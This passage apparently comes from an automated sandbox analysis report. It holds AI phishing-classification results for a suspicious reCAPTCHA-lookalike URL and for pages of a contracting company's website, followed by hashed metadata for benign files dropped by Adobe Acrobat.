                                              "classification":"wellknown",
                                              "reasons":["The brand 'reCAPTCHA' is well-known and is associated with Google.",
                                              "The legitimate domain for reCAPTCHA is 'recaptcha.net' or 'google.com/recaptcha'.",
                                              "The provided URL 'pdf-online.on-fleek.app' does not match the legitimate domain for reCAPTCHA.",
                                              "The URL contains suspicious elements such as 'on-fleek.app',
                                               which is not associated with reCAPTCHA.",
                                              "The use of 'pdf-online' in the URL is unrelated to reCAPTCHA and raises suspicion."],
                                              "brand_matches":[false],
                                              "url_match":false,
                                              "brand_input":"reCAPTCHA",
                                              "input_fields":"reCAPTCHA"}
                                              URL: https://www.citydiamondcontracting.com/about Model: jbxai
                                              {
                                              "brand":["City Diamond Contracting LLC"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"Let's Discuss",
                                              "text_input_field_labels":["unknown"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/certifications Model: jbxai
                                              {
                                              "brand":["City Diamond Contracting LLC"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"Let's Discuss",
                                              "text_input_field_labels":["scroll down"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/projects Model: jbxai
                                              {
                                              "brand":["City Diamond"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"Let's Discuss",
                                              "text_input_field_labels":["Filter: All Projects",
                                              "Filter: Industrial",
                                              "Filter: Educational",
                                              "Filter: Commercial",
                                              "Filter: Residential",
                                              "Filter: Villas"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/news Model: jbxai
                                              {
                                              "brand":["City Diamond Contracting LLC"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"Let's Discuss",
                                              "text_input_field_labels":["unknown"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/services Model: jbxai
                                              {
                                              "brand":["city diamond contracting llc"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"let's discuss",
                                              "text_input_field_labels":["services",
                                              "our main services are"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/video Model: jbxai
                                              {
                                              "brand":["city diamond"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["copy link"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/video Model: jbxai
                                              {
                                              "brand":["City Diamond Contracting"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["unknown"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/video Model: jbxai
                                              {
                                              "brand":["City Diamond Contracting"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["unknown"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/contact#sec1 Model: jbxai
                                              {
                                              "brand":["City Diamond Contracting LLC"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["Name",
                                              "E-mail",
                                              "Phone"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/contact#sec1 Model: jbxai
                                              {
                                              "brand":["City Diamond Contracting LLC"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["Name",
                                              "E-mail",
                                              "Phone"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/contact#sec1 Model: jbxai
                                              {
                                              "phishing_score":2,
                                              "brands":"City Diamond Contracting LLC",
                                              "legit_domain":"citydiamondcontracting.com",
                                              "classification":"unknown",
                                              "reasons":["The brand 'City Diamond Contracting LLC' is not widely recognized and falls under the 'unknown' category.",
                                              "The URL 'www.citydiamondcontracting.com' matches the brand name without any suspicious elements such as misspellings,
                                               extra characters,
                                               or unusual domain extensions.",
                                              "The URL does not contain any extra words or hyphens that would typically indicate a phishing attempt.",
                                              "The input fields (Name,
                                               E-mail,
                                               Phone) are standard and do not raise immediate red flags."],
                                              "brand_matches":[true],
                                              "url_match":true,
                                              "brand_input":"City Diamond Contracting LLC",
                                              "input_fields":"Name,
                                               E-mail,
                                               Phone"}
                                              URL: https://www.citydiamondcontracting.com/contact#sec1 Model: jbxai
                                              {
                                              "brand":["City Diamond Contracting LLC"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["Name",
                                              "E-mail",
                                              "Phone"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/clients Model: jbxai
                                              {
                                              "brand":["amazon"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"unknown",
                                              "text_input_field_labels":["en bi si si"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              URL: https://www.citydiamondcontracting.com/contact#sec1 Model: jbxai
                                              {
                                              "phishing_score":2,
                                              "brands":"City Diamond Contracting LLC",
                                              "legit_domain":"citydiamondcontracting.com",
                                              "classification":"unknown",
                                              "reasons":["The brand 'City Diamond Contracting LLC' is not widely recognized and falls under the 'unknown' category.",
                                              "The URL 'www.citydiamondcontracting.com' matches the brand name without any suspicious elements such as misspellings,
                                               extra characters,
                                               or unusual domain extensions.",
                                              "The URL does not contain any extra words or hyphens that would indicate a partial match or suspicious activity.",
                                              "The input fields (Name,
                                               E-mail,
                                               Phone) are typical for a legitimate business website and do not raise immediate red flags."],
                                              "brand_matches":[true],
                                              "url_match":true,
                                              "brand_input":"City Diamond Contracting LLC",
                                              "input_fields":"Name,
                                               E-mail,
                                               Phone"}
                                              URL: https://www.citydiamondcontracting.com/clients Model: jbxai
                                              {
                                              "brand":["amazon",
                                              "emirates",
                                              "lufthansa",
                                              "mini"],
                                              "contains_trigger_text":false,
                                              "trigger_text":"",
                                              "prominent_button_name":"let's discuss",
                                              "text_input_field_labels":["scroll down"],
                                              "pdf_icon_visible":false,
                                              "has_visible_captcha":false,
                                              "has_urgent_text":false,
                                              "has_visible_qrcode":false}
                                              No context
                                              No context
                                              No context
                                              No context
                                              No context
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):292
                                              Entropy (8bit):5.210000048228099
                                              Encrypted:false
                                              SSDEEP:6:PE9ldbjyq2Pwkn2nKuAl9OmbnIFUt82E9lbB1Zmw+2E9loZRkwOwkn2nKuAl9Omt:PEb8vYfHAahFUt82EbbB1/+2Ebm5JfHi
                                              MD5:920DBDD1D4D5A7A4B0593329A86433FF
                                              SHA1:ED877E1B0D30765C531437761DD82C195C0D88F1
                                              SHA-256:6D0C545BC9C8EFD4C7898F2AF553D415705E203E597E77D5AD9B30442A6FF231
                                              SHA-512:D451EA96A2A5C443A9948175EF746085C81B04C75414CE6BFF68316EA1EF4411605ED0611CF610DFBD43438B454233995F657381EB5250EB7F85536A67D1ECD2
                                              Malicious:false
                                              Reputation:low
                                              Preview:2024/09/27-02:19:14.393 1430 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/27-02:19:14.395 1430 Recovering log #3.2024/09/27-02:19:14.396 1430 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):292
                                              Entropy (8bit):5.210000048228099
                                              Encrypted:false
                                              SSDEEP:6:PE9ldbjyq2Pwkn2nKuAl9OmbnIFUt82E9lbB1Zmw+2E9loZRkwOwkn2nKuAl9Omt:PEb8vYfHAahFUt82EbbB1/+2Ebm5JfHi
                                              MD5:920DBDD1D4D5A7A4B0593329A86433FF
                                              SHA1:ED877E1B0D30765C531437761DD82C195C0D88F1
                                              SHA-256:6D0C545BC9C8EFD4C7898F2AF553D415705E203E597E77D5AD9B30442A6FF231
                                              SHA-512:D451EA96A2A5C443A9948175EF746085C81B04C75414CE6BFF68316EA1EF4411605ED0611CF610DFBD43438B454233995F657381EB5250EB7F85536A67D1ECD2
                                              Malicious:false
                                              Reputation:low
                                              Preview:2024/09/27-02:19:14.393 1430 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/09/27-02:19:14.395 1430 Recovering log #3.2024/09/27-02:19:14.396 1430 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):336
                                              Entropy (8bit):5.198081150985685
                                              Encrypted:false
                                              SSDEEP:6:PE9lS/3+q2Pwkn2nKuAl9Ombzo2jMGIFUt82E9lJZmw+2E9lUfVkwOwkn2nKuAlx:PEbS/OvYfHAa8uFUt82EbJ/+2Ebi5Jfg
                                              MD5:564A18501716A2777BEAB9B9D0443C34
                                              SHA1:20C3B80EEA94D7428766BE68112A463691FD5ABE
                                              SHA-256:C98BF9FBC0DEFA8475B9537D4AA2BA69C55C7BA3C36006AAA3969DAF141219F5
                                              SHA-512:F6276B2833D6113D8617D4EA41223517A9C2C7FB5B84983842CF358A6E2ADB1CE5749F34AC19FD0AECB0F3C8342C081BBF86FF85A4940B5E28A7B1A832D17BA9
                                              Malicious:false
                                              Reputation:low
                                              Preview:2024/09/27-02:19:14.493 1be8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/27-02:19:14.494 1be8 Recovering log #3.2024/09/27-02:19:14.495 1be8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):336
                                              Entropy (8bit):5.198081150985685
                                              Encrypted:false
                                              SSDEEP:6:PE9lS/3+q2Pwkn2nKuAl9Ombzo2jMGIFUt82E9lJZmw+2E9lUfVkwOwkn2nKuAlx:PEbS/OvYfHAa8uFUt82EbJ/+2Ebi5Jfg
                                              MD5:564A18501716A2777BEAB9B9D0443C34
                                              SHA1:20C3B80EEA94D7428766BE68112A463691FD5ABE
                                              SHA-256:C98BF9FBC0DEFA8475B9537D4AA2BA69C55C7BA3C36006AAA3969DAF141219F5
                                              SHA-512:F6276B2833D6113D8617D4EA41223517A9C2C7FB5B84983842CF358A6E2ADB1CE5749F34AC19FD0AECB0F3C8342C081BBF86FF85A4940B5E28A7B1A832D17BA9
                                              Malicious:false
                                              Reputation:low
                                              Preview:2024/09/27-02:19:14.493 1be8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/09/27-02:19:14.494 1be8 Recovering log #3.2024/09/27-02:19:14.495 1be8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):475
                                              Entropy (8bit):4.975824910517686
                                              Encrypted:false
                                              SSDEEP:12:YH/um3RA8sqIOksBdOg2Hgcaq3QYiubInP7E4T3y:Y2sRdsDOJdMHL3QYhbG7nby
                                              MD5:AE4BB6F7E2A5BB9CFCB6AB3AEFE77680
                                              SHA1:30D71FDAC333CC21B4B794B4654EC489F4AAFA8D
                                              SHA-256:62324338AD0E4196C9FB8570200A4E088F92F8DE284D1F8B812A56321032495F
                                              SHA-512:FB38E1DBF78B2D0FC96983FD7DF8E254ECF50B1B15C98B4EBD0916A897AA6DC874C928C0D4BD59738A38BDE6EDDD81F01C614D18578E151C5E9F2EA868703C19
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13371977960158089","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":128830},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:JSON data
                                              Category:modified
                                              Size (bytes):475
                                              Entropy (8bit):4.975824910517686
                                              Encrypted:false
                                              SSDEEP:12:YH/um3RA8sqIOksBdOg2Hgcaq3QYiubInP7E4T3y:Y2sRdsDOJdMHL3QYhbG7nby
                                              MD5:AE4BB6F7E2A5BB9CFCB6AB3AEFE77680
                                              SHA1:30D71FDAC333CC21B4B794B4654EC489F4AAFA8D
                                              SHA-256:62324338AD0E4196C9FB8570200A4E088F92F8DE284D1F8B812A56321032495F
                                              SHA-512:FB38E1DBF78B2D0FC96983FD7DF8E254ECF50B1B15C98B4EBD0916A897AA6DC874C928C0D4BD59738A38BDE6EDDD81F01C614D18578E151C5E9F2EA868703C19
                                              Malicious:false
                                              Reputation:low
                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13371977960158089","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":128830},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4730
                                              Entropy (8bit):5.25282953371253
                                              Encrypted:false
                                              SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7EQ1DQQPOZ:etJCV4FiN/jTN/2r8Mta02fEhgO73goi
                                              MD5:0A0429F0DEA0851C9F988F554902AFC1
                                              SHA1:7F82EEDA938707408E7D546DF01DE20AFF778F9B
                                              SHA-256:7111C0D7E9D74CD463C93E77FF0A90C5726D97E2B5EA2E0DFF6F6E2A46C3FFFB
                                              SHA-512:D2562AEC46F72C83A5E11518A6D73B2D3543229CEAD7F51217C76CCFA498C63B36DBC24BE79523B04EC36387E376E0C5EE4F7EA2293FBFB375BB7AADB77AA4D7
                                              Malicious:false
                                              Reputation:low
                                              Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):324
                                              Entropy (8bit):5.224243192151396
                                              Encrypted:false
                                              SSDEEP:6:PE9ltw+q2Pwkn2nKuAl9OmbzNMxIFUt82E9ltdFBZmw+2E9lt1UVkwOwkn2nKuAo:PEbt1vYfHAa8jFUt82EbtdFB/+2Ebtaj
                                              MD5:B4AD08D42F52AA0412298FBE0AEF35B4
                                              SHA1:EC9B0BA36E8A34BBA9C180748DAA908AB49BAAF3
                                              SHA-256:8EF9B6BDB8F615EC94FD19F785AFCB0C9188CDF5BABE40A9641EEE88759DEACC
                                              SHA-512:9D388AFC97207468813F98FA740611D83309A5EFFBA6F91C04FAE83CFDF55D915A07C557B1B3A0F7FB77DDBC1097EF26E9ACC6EE7928911B9EB98221E7FA59EA
                                              Malicious:false
                                              Reputation:low
                                              Preview:2024/09/27-02:19:14.587 1be8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/27-02:19:14.588 1be8 Recovering log #3.2024/09/27-02:19:14.589 1be8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):324
                                              Entropy (8bit):5.224243192151396
                                              Encrypted:false
                                              SSDEEP:6:PE9ltw+q2Pwkn2nKuAl9OmbzNMxIFUt82E9ltdFBZmw+2E9lt1UVkwOwkn2nKuAo:PEbt1vYfHAa8jFUt82EbtdFB/+2Ebtaj
                                              MD5:B4AD08D42F52AA0412298FBE0AEF35B4
                                              SHA1:EC9B0BA36E8A34BBA9C180748DAA908AB49BAAF3
                                              SHA-256:8EF9B6BDB8F615EC94FD19F785AFCB0C9188CDF5BABE40A9641EEE88759DEACC
                                              SHA-512:9D388AFC97207468813F98FA740611D83309A5EFFBA6F91C04FAE83CFDF55D915A07C557B1B3A0F7FB77DDBC1097EF26E9ACC6EE7928911B9EB98221E7FA59EA
                                              Malicious:false
                                              Reputation:low
                                              Preview:2024/09/27-02:19:14.587 1be8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/09/27-02:19:14.588 1be8 Recovering log #3.2024/09/27-02:19:14.589 1be8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                              Category:dropped
                                              Size (bytes):65110
                                              Entropy (8bit):1.060383832009551
                                              Encrypted:false
                                              SSDEEP:96:GjzMNRssSrvqnOI/EkyPYkCjXc4u9nLVukIfK9MTLP8OI99949919l:GjYNRsjunOgjMrnLOfK9sLP8Or
                                              MD5:09169630FB7871D6225FA881D5229FAE
                                              SHA1:0ABC373F1ACD89924B46F1BFF9E306A5DF6D8B36
                                              SHA-256:BF5800FE5D2E1D0F06270878C8C368035EB6BF5B303CDC813DB3ED55393F26F2
                                              SHA-512:54601C309DD1703155DAD7B2581102869E3524361413E6891608D1539BC5D09E38EF229B0E1831F9142271C5B0BF96B10B12D98674B592AD924411FB0D987F17
                                              Malicious:false
                                              Reputation:low
                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                              Category:dropped
                                              Size (bytes):86016
                                              Entropy (8bit):4.444960831033683
                                              Encrypted:false
                                              SSDEEP:384:yezci5tWiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rZs3OazzU89UTTgUL
                                              MD5:FD10B1CC5A14B570D89E4E7F1CCF1668
                                              SHA1:A5F7CCCFE6F88447048B5EFB148D1B4016DE9EDF
                                              SHA-256:C68C575385BEBE41DDA80965F49B4899B99A3BB84CB6CAFF68110C16DF94B12F
                                              SHA-512:683D6B87BE8B09369370DE3CB58E57B1EA44DE29526D6A941DBB81D96ED46EC5F42D118995E4D4932CC11738A473E80B3CDE361F5307977EBF445A3FCA1E109C
                                              Malicious:false
                                              Reputation:low
                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:SQLite Rollback Journal
                                              Category:dropped
                                              Size (bytes):8720
                                              Entropy (8bit):3.7758626307458827
                                              Encrypted:false
                                              SSDEEP:48:7MXp/E2ioyVlioy9oWoy1Cwoy1hKOioy1noy1AYoy1Wioy1hioybioydoy1noy1X:74pjulFEXKQcJb9IVXEBodRBkZ
                                              MD5:0E54FAF2DBBB72163C8EFCD914E5E5BE
                                              SHA1:0D110B7B57680A7807CFDB716CFFFE9EDFA36186
                                              SHA-256:2AF0DE3F5D7C90F8007FCB529299C39DDA69C0DA58E66F6BCAB728CBEDC3888F
                                              SHA-512:2F77BC34C3CD2408C1CAAE4E58B7AFBD5B0E2AD0DB0589D303C601FADAA63CB664A423227891BE8248382B3528D7167DC0C672E3D35ABE0FAA81918A899A03C6
                                              Malicious:false
                                              Reputation:low
                                              Preview:.... .c.....x..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:Certificate, Version=3
                                              Category:dropped
                                              Size (bytes):1391
                                              Entropy (8bit):7.705940075877404
                                              Encrypted:false
                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                              Malicious:false
                                              Reputation:low
                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):192
                                              Entropy (8bit):2.7177881616921047
                                              Encrypted:false
                                              SSDEEP:3:kkFklWIL/tfllXlE/HT8k3ZNNX8RolJuRdxLlGB9lQRYwpDdt:kKPAeT88NMa8RdWBwRd
                                              MD5:24743CE9A119396D7AB70FCD21849E0B
                                              SHA1:36AEB6098A651CB122CD2B4FF2A19C203B7F9680
                                              SHA-256:0CA409E6574816889331F66BE6A2C61B0F1D69CA32CCFB4E04D8DA8638D7200F
                                              SHA-512:1B02279463885973A9002D52867C20EE1D7D1A60DD6EEE3EE0526C24E8F7132414D440618768A647F8C1B1FA04744D38978380A68D01D7073253A9F53689738D
                                              Malicious:false
                                              Reputation:low
                                              Preview:p...... ........e.<4....(....................................................... ..........W.... ...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):185099
                                              Entropy (8bit):5.182478651346149
                                              Encrypted:false
                                              SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                              Malicious:false
                                              Reputation:low
                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:PostScript document text
                                              Category:dropped
                                              Size (bytes):185099
                                              Entropy (8bit):5.182478651346149
                                              Encrypted:false
                                              SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                              Malicious:false
                                              Reputation:low
